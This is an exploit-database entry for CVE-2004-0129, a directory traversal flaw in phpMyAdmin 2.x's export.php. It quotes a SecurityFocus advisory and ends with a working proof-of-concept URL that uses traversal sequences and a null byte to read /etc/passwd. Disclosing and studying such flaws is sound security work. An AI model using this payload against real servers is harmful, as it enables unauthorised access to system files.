phpMyAdmin 2.x - 'Export.php' File Disclosure
| EKU-ID: 29073 | CVE: CVE-2004-0129;OSVDB-3800 | OSVDB-ID: |
| Author: Cedric Cochin | Published: 2004-02-03 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 29073 | CVE: CVE-2004-0129;OSVDB-3800 | OSVDB-ID: |
| Author: Cedric Cochin | Published: 2004-02-03 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/9564/info phpMyAdmin is prone to a vulnerability that may permit remote attackers to gain access to files that are readable by the hosting web server. The issue is reported to exist in the 'export.php' script and may be exploited by providing directory traversal sequences as an argument for a specific URI parameter. http://www.example.com/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00